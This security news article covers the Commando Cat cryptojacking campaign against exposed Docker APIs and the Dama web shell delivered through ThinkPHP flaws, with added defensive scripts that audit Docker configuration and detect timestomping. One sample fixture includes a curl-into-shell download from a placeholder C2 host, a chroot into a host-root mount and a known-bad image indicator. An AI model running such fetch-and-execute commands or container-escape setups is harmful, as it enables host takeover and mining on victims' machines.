The threat actor known as Commando Cat has been linked to an ongoing cryptojacking campaign that leverages poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
"The attackers used the cmd.cat/chattr docker image container that retrieves the payload from their own command-and-control (C&C) infrastructure," Trend Micro researchers Sunil Bharti and Shubham Singh said in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando project to generate a benign container, was first documented earlier this year by Cado Security.
The attacks are characterized by the targeting of misconfigured Docker remote API servers to deploy a Docker image named cmd.cat/chattr, which is then used as a base to instantiate a container, break out of its confines using the chroot command, and gain access to the host operating system. The escape is not a flaw in chroot or in the container runtime: an attacker who can reach an unauthenticated Docker API can create a container with whatever host mounts and privileges they choose, so the host is effectively already theirs once the API is exposed.
The final step involves retrieving the malicious miner binary using a curl or wget command from a C&C server ("leetdbs.anondns[.]net/z") via a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on the Kaiten (aka Tsunami) malware.
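To make the misconfiguration concrete, here is an added audit script (example code written for this article, not tooling from Trend Micro, Cado Security or the attackers). It reads a daemon.json and a `docker inspect` document and flags the conditions the campaign depends on: a remote API bound to a non-loopback TCP address without `tlsverify`, a privileged container, the host PID namespace, the host root bind-mounted into the container, a chroot in the container command, and the cmd.cat/chattr image name reported above. The sample documents are constructed, and the C2 URL in them is a placeholder.

```python
"""Audit checks for the Docker misconfigurations the Commando Cat campaign relies on.

Example code added to this article; it is not tooling from Trend Micro or Cado Security.
Inputs are the JSON shapes of /etc/docker/daemon.json and of `docker inspect <container>`;
the sample documents at the bottom are constructed and the C2 URL in them is a placeholder.
"""
import json
from urllib.parse import urlparse

# Host paths that hand the container effective control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}

# Image name reported in the article.
KNOWN_BAD_IMAGES = {"cmd.cat/chattr"}

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def audit_daemon_config(cfg: dict) -> list:
    """Flag a daemon whose remote API listens on the network without TLS client auth."""
    findings = []
    for host in cfg.get("hosts", []):
        u = urlparse(host)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// listeners are not reachable over the network
        if (u.hostname or "0.0.0.0") in LOOPBACK:
            continue
        if not cfg.get("tlsverify"):
            findings.append(
                f"remote API on {host} without tlsverify: anyone who can reach "
                f"port {u.port or 2375} can create containers and choose their mounts"
            )
    return findings


def _bind_sources(host_config: dict, mounts) -> list:
    """Host-side paths from HostConfig.Binds ("src:dst[:opts]") and the Mounts array, deduplicated."""
    sources = [b.split(":", 1)[0] for b in host_config.get("Binds") or []]
    sources += [m.get("Source", "") for m in mounts or [] if m.get("Type") == "bind"]
    return list(dict.fromkeys(sources))


def audit_container(inspect_doc: dict) -> list:
    """Flag container settings that turn 'can create a container' into 'owns the host'."""
    findings = []
    cfg = inspect_doc.get("Config") or {}
    hc = inspect_doc.get("HostConfig") or {}

    image = cfg.get("Image", "")
    if image.rsplit(":", 1)[0] in KNOWN_BAD_IMAGES:
        findings.append(f"image {image} matches a known cryptojacking indicator")
    if hc.get("Privileged"):
        findings.append("Privileged=true removes the capability and device restrictions")
    if hc.get("PidMode") == "host":
        findings.append("PidMode=host exposes every host process to the container")
    for src in _bind_sources(hc, inspect_doc.get("Mounts")):
        if src in SENSITIVE_HOST_PATHS:
            findings.append(
                f"host path {src} is bind-mounted into the container; "
                "a chroot into the mount point is a host shell"
            )
    cmd = " ".join(cfg.get("Cmd") or [])
    if "chroot" in cmd.split():
        findings.append(f"container command invokes chroot: {cmd}")
    return findings


# Constructed sample: daemon listening on all interfaces without TLS (the campaign's entry point).
SAMPLE_DAEMON_JSON = json.loads('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}')

# Constructed sample in the shape of `docker inspect`, modelled on the article: the
# cmd.cat/chattr image, the host root bind-mounted at /host and a chroot into it.
SAMPLE_INSPECT = json.loads("""
{
  "Config": {
    "Image": "cmd.cat/chattr",
    "Cmd": ["chroot", "/host", "sh", "-c", "curl -s http://c2.example.invalid/z | sh"]
  },
  "HostConfig": {"Privileged": true, "PidMode": "host", "Binds": ["/:/host"]},
  "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}]
}
""")

if __name__ == "__main__":
    for f in audit_daemon_config(SAMPLE_DAEMON_JSON) + audit_container(SAMPLE_INSPECT):
        print("FINDING:", f)
```

Against a live host, feed `json.load` the output of `docker inspect <container>` and the contents of /etc/docker/daemon.json. The corrected daemon configuration either drops the `tcp://` listener altogether or pairs it with `"tlsverify": true` and `tlscacert`/`tlscert`/`tlskey`, so that only holders of a client certificate signed by your CA can create containers.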
"The significance of this attack campaign lies in its use of Docker images to deploy cryptojacking scripts on compromised systems," the researchers said. "This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software."
The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP applications (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-speaking threat actor to deliver a web shell dubbed Dama as part of a campaign that has been underway since October 17, 2023.
"The exploit attempts to retrieve additional obfuscated code from another compromised ThinkPHP server to gain initial foothold," Akamai researchers Ron Mankivsky and Maxim Zavodchik said. "After successfully exploiting the system, the attackers will install a Chinese language web shell named Dama to maintain persistent access to the server."
The web shell is equipped with several advanced capabilities to gather system data, upload files, scan network ports, escalate privileges, and navigate the file system, the latter of which enables threat actors to perform operations like file editing, deletion, and timestamp modification for obfuscation purposes (so that a freshly dropped file carries the same dates as the legitimate files around it and does not stand out in a listing sorted by modification time).
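Timestamp tampering of that kind leaves a trace on POSIX systems: utime() and `touch` can set a file's mtime to any value, but the kernel always sets ctime to the current clock, so a file whose claimed mtime is far older than its ctime (or later than it) warrants a look. The following is an added example written for this article, not part of Akamai's write-up or of the Dama web shell; the web root it scans is constructed in a temporary directory, with one file back-dated the way a dropped shell would be.

```python
"""Spot files whose modification time was likely back-dated (timestomping).

Example code added to this article, not part of Akamai's write-up or the Dama web shell.
It relies on POSIX semantics: utime()/touch set mtime freely, but the kernel always sets
ctime to 'now', so mtime far older than ctime, or later than ctime, is suspicious. On
Windows st_ctime is the creation time and this heuristic does not apply.
"""
import os
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path


@dataclass
class Finding:
    path: str
    reason: str
    mtime: float
    ctime: float


def scan_for_timestomping(root: str, max_skew: float = 7 * 86400) -> list:
    """Walk `root` and flag files whose mtime is inconsistent with their ctime.

    max_skew: how much older than ctime an mtime may be before it is flagged.
    A legitimate chmod/chown/rename also bumps ctime, so keep this in days and
    review hits against the web root's deploy history rather than treating
    them as proof on their own.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the sweep
            if st.st_mtime > st.st_ctime + 1:
                findings.append(Finding(
                    p, "mtime is later than ctime (set after the last inode change)",
                    st.st_mtime, st.st_ctime))
            elif st.st_ctime - st.st_mtime > max_skew:
                days = (st.st_ctime - st.st_mtime) / 86400
                findings.append(Finding(
                    p, f"mtime predates ctime by {days:.0f} days", st.st_mtime, st.st_ctime))
    return findings


def build_demo_webroot() -> str:
    """Create a constructed web root: two normal files and one back-dated stand-in for a shell."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for name in ("index.php", "config.php"):
        Path(root, name).write_text("<?php // legitimate application file\n")
    dropped = Path(root, "uploads", "cache.php")
    dropped.parent.mkdir()
    dropped.write_text("<?php // constructed stand-in for a dropped web shell\n")
    # Back-date atime and mtime to 2020-01-01; ctime stays at 'now' regardless.
    backdated = time.mktime((2020, 1, 1, 0, 0, 0, 0, 0, -1))
    os.utime(dropped, (backdated, backdated))
    return root


if __name__ == "__main__":
    for f in scan_for_timestomping(build_demo_webroot()):
        print(f"{f.path}: {f.reason}")
```

Point `scan_for_timestomping` at the real document root of a suspected ThinkPHP host and pair its hits with the web server's access log for the same window; a back-dated PHP file that was first requested only recently is a strong lead even when the file's mtime claims it has been there for years.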
"The recent attacks originated by a Chinese-speaking adversary highlight an ongoing trend of attackers using a fully fledged web shell, designed for advanced victim control," the researchers noted. "Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems."